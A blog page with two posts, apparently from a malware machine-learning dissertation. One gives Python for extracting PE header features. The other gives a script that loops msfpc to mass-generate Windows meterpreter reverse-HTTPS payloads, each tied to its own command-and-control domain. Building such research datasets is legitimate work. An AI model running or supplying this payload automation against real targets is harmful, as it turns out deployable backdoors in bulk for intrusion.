The Wandering Tech: python

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.

The code uses the 2012 Adobe's Malware Classifier as a reference and modified accordingly for my own purpose.

The code uses PEFile python module to read and work with PE files.

My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First import the required python library.

import os
import pefile
import pandas as pd
import hashlib

Next define the function for computing md5 value given the filename. *Filename requires full path if binary is located in a separate directory from the python script.

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

Next define a python class to represent the PE binary file.

class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample

Method to iterate through a directory for PE Files. PE Header and Section information are extracted and stored in a python dictionary and returned.

def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset

Method to save python dictionary returned by pe2vec() function to a CSV file.

def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')

Full Code is shown below:

import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample
    
def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset
    
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')
    
pedata = pe2vec()
saveToCSV(pedata)

This post serves as a journal of the technique used for automating generation of Metasploit payloads.

Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: Previously i used MSVenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper class on top of MSFVenom. MSFPC is insufficient to meet my objective, thus i had to write a wrapper class on top of MSFPC.

*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant.

Overview:
1) On a Kali Linux VM
2) Update Metasploit

apt update
apt install metasploit-framework

3) Install MSFPC

apt install -y msfpc

4) Open gedit and copy the below python script

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

correctmsg = "Done"
errmsg = "bignum too big to convert"

startfrom = 2

for index, row in df.iterrows():
	if startfrom > index:
		print ("skip: "+str(row[1]))
		continue

	attempt = 1
	#uncomment the 2 lines below to use the resolved ip address instead 
	try:
		addr = socket.gethostbyname(row[0])
		print(addr)
	except socket_error as serr:		
		if serr.errno == -2:
			print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
			row[0] = "127.0.0.1"

	command = "windows " + row[0] + " https" 
	binaryname = str(row[1])+".exe"
	print (command)
	
	#set i to any positive number to start the loop 	
	i = 9999
	x = -1
	while x == -1:
		proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
		tmp = proc.communicate()[0]
		x = tmp.find(correctmsg)
		#-1 represent errmsg is not found thus implying that crafting is successful
		i = tmp.find(errmsg)
		#print ("i value:" + str(i))

		if i != -1 :
			print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
			attempt = attempt + 1 
		if x == -1 :
			print ("error: " + tmp)
			attempt = attempt + 1 

	print ("Command: msfpc " + command + " is successful.")
	print ("Saving as :" + binaryname)
	subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
	print ("Saved")
	print ("")

5) Create a csv file using excel with the following format and save it as website.csv:

6) Execute the Python script (*internet is needed as msfvenom will validate the LHOST domain name)

7) About 40mins for 100 binaries, 900 to go =)

The Wandering Tech

Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

Wednesday, July 25, 2018

Automating generation of Metasploit payloads

Labels

Followers

Blog Archive

About Me